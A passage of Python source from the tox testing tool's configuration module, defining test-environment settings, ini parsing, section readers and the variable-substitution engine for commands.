default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
is_bin = (
isinstance(self.python_info, NoInterpreterInfo)
or tox.INFO.IS_WIN is False
or self.python_info.implementation == "Jython"
or (
tox.INFO.IS_WIN
and self.python_info.implementation == "PyPy"
and self.python_info.extra_version_info < (7, 3, 1)
)
)
return self.envdir.join("bin" if is_bin else "Scripts")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts",
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err),
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
self.expand_section_names(self._cfg)
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection],
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
reader.addsubstitutions(distshare=config.distshare)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(temp_dir=config.temp_dir)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
),
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config,
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback,
)
elif atype == "space-separated-list":
res = reader.getlist(env_attr.name, sep=" ")
elif atype == "line-list":
res = reader.getlist(env_attr.name, sep="\n")
elif atype == "env-list":
res = reader.getstring(env_attr.name, replace=False)
res = tuple(_split_env(res))
else:
raise ValueError("unknown type {!r}".format(atype))
if env_attr.postprocess:
res = env_attr.postprocess(testenv_config=tc, value=res)
except tox.exception.MissingSubstitution as e:
tc._missing_subs.append(e.name)
res = e.FLAG
setattr(tc, env_attr.name, res)
if atype in ("path", "string", "basepython"):
reader.addsubstitutions(**{env_attr.name: res})
return tc
def _getallenvs(self, reader, extra_env_list=None):
extra_env_list = extra_env_list or []
env_str = reader.getstring("envlist", replace=False)
env_list = _split_env(env_str)
for env in extra_env_list:
if env not in env_list:
env_list.append(env)
all_envs = OrderedDict((i, None) for i in env_list)
for section in self._cfg:
if section.name.startswith(testenvprefix):
all_envs[section.name[len(testenvprefix) :]] = None
if not all_envs:
all_envs["python"] = None
return list(all_envs.keys())
def _getenvdata(self, reader, config):
from_option = self.config.option.env
from_environ = os.environ.get("TOXENV")
from_config = reader.getstring("envlist", replace=False)
env_list = []
envlist_explicit = False
if (from_option and "ALL" in from_option) or (
not from_option and from_environ and "ALL" in from_environ.split(",")
):
all_envs = self._getallenvs(reader)
else:
candidates = (
(os.environ.get(PARALLEL_ENV_VAR_KEY_PRIVATE), True),
(from_option, True),
(from_environ, True),
("py" if self.config.option.devenv is not None else None, False),
(from_config, False),
)
env_str, envlist_explicit = next(((i, e) for i, e in candidates if i), ([], False))
env_list = _split_env(env_str)
all_envs = self._getallenvs(reader, env_list)
if not env_list:
env_list = all_envs
package_env = config.isolated_build_env
if config.isolated_build is True and package_env in all_envs:
all_envs.remove(package_env)
if config.isolated_build is True and package_env in env_list:
msg = "isolated_build_env {} cannot be part of envlist".format(package_env)
raise tox.exception.ConfigError(msg)
return env_list, all_envs, _split_env(from_config), envlist_explicit
@staticmethod
def expand_section_names(config):
"""Generative section names.
Allow writing section as [testenv:py{36,37}-cov]
The parser will see it as two different sections: [testenv:py36-cov], [testenv:py37-cov]
"""
factor_re = re.compile(r"\{\s*([\w\s,]+)\s*\}")
split_re = re.compile(r"\s*,\s*")
to_remove = set()
for section in list(config.sections):
split_section = factor_re.split(section)
for parts in itertools.product(*map(split_re.split, split_section)):
section_name = "".join(parts)
if section_name not in config.sections:
config.sections[section_name] = config.sections[section]
to_remove.add(section)
for section in to_remove:
del config.sections[section]
def _split_env(env):
"""if handed a list, action="append" was used for -e """
if env is None:
return []
if not isinstance(env, list):
env = [e.split("#", 1)[0].strip() for e in env.split("\n")]
env = ",".join([e for e in env if e])
env = [env]
return mapcat(_expand_envstr, env)
def _is_negated_factor(factor):
return factor.startswith("!")
def _base_factor_name(factor):
return factor[1:] if _is_negated_factor(factor) else factor
def _split_factor_expr(expr):
def split_single(e):
raw = e.split("-")
included = {_base_factor_name(factor) for factor in raw if not _is_negated_factor(factor)}
excluded = {_base_factor_name(factor) for factor in raw if _is_negated_factor(factor)}
return included, excluded
partial_envs = _expand_envstr(expr)
return [split_single(e) for e in partial_envs]
def _split_factor_expr_all(expr):
partial_envs = _expand_envstr(expr)
return [{_base_factor_name(factor) for factor in e.split("-")} for e in partial_envs]
def _expand_envstr(envstr):
# split by commas not in groups
tokens = _ENVSTR_SPLIT_PATTERN.split(envstr)
envlist = ["".join(g).strip() for k, g in itertools.groupby(tokens, key=bool) if k]
def expand(env):
tokens = _ENVSTR_EXPAND_PATTERN.split(env)
parts = [_WHITESPACE_PATTERN.sub("", token).split(",") for token in tokens]
return ["".join(variant) for variant in itertools.product(*parts)]
return mapcat(expand, envlist)
def mapcat(f, seq):
return list(itertools.chain.from_iterable(map(f, seq)))
class DepConfig:
def __init__(self, name, indexserver=None):
self.name = name
self.indexserver = indexserver
def __repr__(self):
if self.indexserver:
if self.indexserver.name == "default":
return self.name
return ":{}:{}".format(self.indexserver.name, self.name)
return str(self.name)
class IndexServerConfig:
def __init__(self, name, url=None):
self.name = name
self.url = url
def __repr__(self):
return "IndexServerConfig(name={}, url={})".format(self.name, self.url)
is_section_substitution = re.compile(r"{\[[^{}\s]+\]\S+?}").match
# Check value matches substitution form of referencing value from other section.
# E.g. {[base]commands}
class SectionReader:
def __init__(self, section_name, cfgparser, fallbacksections=None, factors=(), prefix=None):
if prefix is None:
self.section_name = section_name
else:
self.section_name = "{}:{}".format(prefix, section_name)
self._cfg = cfgparser
self.fallbacksections = fallbacksections or []
self.factors = factors
self._subs = {}
self._subststack = []
self._setenv = None
def get_environ_value(self, name):
if self._setenv is None:
return os.environ.get(name)
return self._setenv.get(name)
def addsubstitutions(self, _posargs=None, **kw):
self._subs.update(kw)
if _posargs:
self.posargs = _posargs
def getpath(self, name, defaultpath, replace=True):
path = self.getstring(name, defaultpath, replace=replace)
if path is not None:
toxinidir = self._subs["toxinidir"]
return toxinidir.join(path, abs=True)
def getlist(self, name, sep="\n"):
s = self.getstring(name, None)
if s is None:
return []
return [x.strip() for x in s.split(sep) if x.strip()]
def getdict(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace)
return self._getdict(value, default=default, sep=sep, replace=replace)
def getdict_setenv(self, name, default=None, sep="\n", replace=True):
value = self.getstring(name, None, replace=replace, crossonly=True)
definitions = self._getdict(value, default=default, sep=sep, replace=replace)
self._setenv = SetenvDict(definitions, reader=self)
return self._setenv
def _getdict(self, value, default, sep, replace=True):
if value is None or not replace:
return default or {}
d = {}
for line in value.split(sep):
if line.strip():
name, rest = line.split("=", 1)
d[name.strip()] = rest.strip()
return d
def getfloat(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, float):
try:
s = float(s)
except ValueError:
raise tox.exception.ConfigError("{}: invalid float {!r}".format(name, s))
return s
def getbool(self, name, default=None, replace=True):
s = self.getstring(name, default, replace=replace)
if not s or not replace:
s = default
if s is None:
raise KeyError("no config value [{}] {} found".format(self.section_name, name))
if not isinstance(s, bool):
if s.lower() == "true":
s = True
elif s.lower() == "false":
s = False
else:
raise tox.exception.ConfigError(
"{}: boolean value {!r} needs to be 'True' or 'False'".format(name, s),
)
return s
def getargvlist(self, name, default="", replace=True):
s = self.getstring(name, default, replace=False)
return _ArgvlistReader.getargvlist(self, s, replace=replace)
def getargv(self, name, default="", replace=True):
return self.getargvlist(name, default, replace=replace)[0]
def getstring(self, name, default=None, replace=True, crossonly=False, no_fallback=False):
x = None
sections = [self.section_name] + ([] if no_fallback else self.fallbacksections)
for s in sections:
try:
x = self._cfg[s][name]
break
except KeyError:
continue
if x is None:
x = default
else:
# It is needed to apply factors before unwrapping
# dependencies, otherwise it can break the substitution
# process. Once they are unwrapped, we call apply factors
# again for those new dependencies.
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
x = self._apply_factors(x)
x = self._replace_if_needed(x, name, replace, crossonly)
return x
def _replace_if_needed(self, x, name, replace, crossonly):
if replace and x and hasattr(x, "replace"):
x = self._replace(x, name=name, crossonly=crossonly)
return x
def _apply_factors(self, s):
def factor_line(line):
m = _FACTOR_LINE_PATTERN.search(line)
if not m:
return line
expr, line = m.groups()
if any(
included <= self.factors and not any(x in self.factors for x in excluded)
for included, excluded in _split_factor_expr(expr)
):
return line
lines = s.strip().splitlines()
return "\n".join(filter(None, map(factor_line, lines)))
def _replace(self, value, name=None, section_name=None, crossonly=False):
if "{" not in value:
return value
section_name = section_name if section_name else self.section_name
self._subststack.append((section_name, name))
try:
replaced = Replacer(self, crossonly=crossonly).do_replace(value)
assert self._subststack.pop() == (section_name, name)
except tox.exception.MissingSubstitution:
if not section_name.startswith(testenvprefix):
raise tox.exception.ConfigError(
"substitution env:{!r}: unknown or recursive definition in"
" section {!r}.".format(value, section_name),
)
raise
return replaced
class Replacer:
RE_ITEM_REF = re.compile(
r"""
(?<!\\)[{]
(?:(?P<sub_type>[^[:{}]+):)? # optional sub_type for special rules
(?P<substitution_value>(?:\[[^,{}]*\])?[^:,{}]*) # substitution key
(?::(?P<default_value>[^{}]*))? # default value
[}]
""",
re.VERBOSE,
)
def __init__(self, reader, crossonly=False):
self.reader = reader
self.crossonly = crossonly
def do_replace(self, value):
"""
Recursively expand substitutions starting from the innermost expression
"""
def substitute_once(x):
return self.RE_ITEM_REF.sub(self._replace_match, x)
expanded = substitute_once(value)
while expanded != value: # substitution found
value = expanded
expanded = substitute_once(value)
return expanded
def _replace_match(self, match):
g = match.groupdict()
sub_value = g["substitution_value"]
if self.crossonly:
if sub_value.startswith("["):
return self._substitute_from_other_section(sub_value)
# in crossonly we return all other hits verbatim
start, end = match.span()
return match.string[start:end]
# special case: all empty values means ":" which is os.pathsep
if not any(g.values()):
return os.pathsep
# special case: opts and packages. Leave {opts} and
# {packages} intact, they are replaced manually in
# _venv.VirtualEnv.run_install_command.
if sub_value in ("opts", "packages"):
return "{{{}}}".format(sub_value)
try:
sub_type = g["sub_type"]
except KeyError:
raise tox.exception.ConfigError(
"Malformed substitution; no substitution type provided",
)
if sub_type == "env":
return self._replace_env(match)
if sub_type == "tty":
if is_interactive():
return match.group("substitution_value")
return match.group("default_value")
if sub_type is not None:
raise tox.exception.ConfigError(
"No support for the {} substitution type".format(sub_type),
)
return self._replace_substitution(match)
def _replace_env(self, match):
key = match.group("substitution_value")
if not key:
raise tox.exception.ConfigError("env: requires an environment variable name")
default = match.group("default_value")
value = self.reader.get_environ_value(key)
if value is not None:
return value
if default is not None:
return default
raise tox.exception.MissingSubstitution(key)
def _substitute_from_other_section(self, key):
if key.startswith("[") and "]" in key:
i = key.find("]")
section, item = key[1:i], key[i + 1 :]
cfg = self.reader._cfg
if section in cfg and item in cfg[section]:
if (section, item) in self.reader._subststack:
raise ValueError(
"{} already in {}".format((section, item), self.reader._subststack),
)
x = str(cfg[section][item])
return self.reader._replace(
x, name=item, section_name=section, crossonly=self.crossonly,
)
raise tox.exception.ConfigError("substitution key {!r} not found".format(key))
def _replace_substitution(self, match):
sub_key = match.group("substitution_value")
val = self.reader._subs.get(sub_key, None)
if val is None:
val = self._substitute_from_other_section(sub_key)
if callable(val):
val = val()
return str(val)
def is_interactive():
return sys.stdin.isatty()
class _ArgvlistReader:
@classmethod
def getargvlist(cls, reader, value, replace=True):
"""Parse ``commands`` argvlist multiline string.
:param SectionReader reader: reader to be used.
:param str value: Content stored by key.
:rtype: list[list[str]]
:raise :class:`tox.exception.ConfigError`:
line-continuation ends nowhere while resolving for specified section
"""
commands = []
current_command = ""
for line in value.splitlines():
line = line.rstrip()
if not line:
continue
if line.endswith("\\"):
current_command += " {}".format(line[:-1])
continue
current_command += line
if is_section_substitution(current_command):
replaced = reader._replace(current_command, crossonly=True)
commands.extend(cls.getargvlist(reader, replaced))
else:
commands.append(cls.processcommand(reader, current_command, replace))
current_command = ""
else:
if current_command:
raise tox.exception.ConfigError(
"line-continuation ends nowhere while resolving for [{}] {}".format(
reader.section_name, "commands",
),
)
return commands
@classmethod
def processcommand(cls, reader, command, replace=True):
posargs = getattr(reader, "posargs", "")
if sys.platform.startswith("win"):
posargs_string = list2cmdline([x for x in posargs if x])
else:
posargs_string = " ".join([shlex_quote(x) for x in posargs if x])
# Iterate through each word of the command substituting as
# appropriate to construct the new command string. This
# string is then broken up into exec argv components using
# shlex.
if replace:
newcommand = ""
for word in CommandParser(command).words():
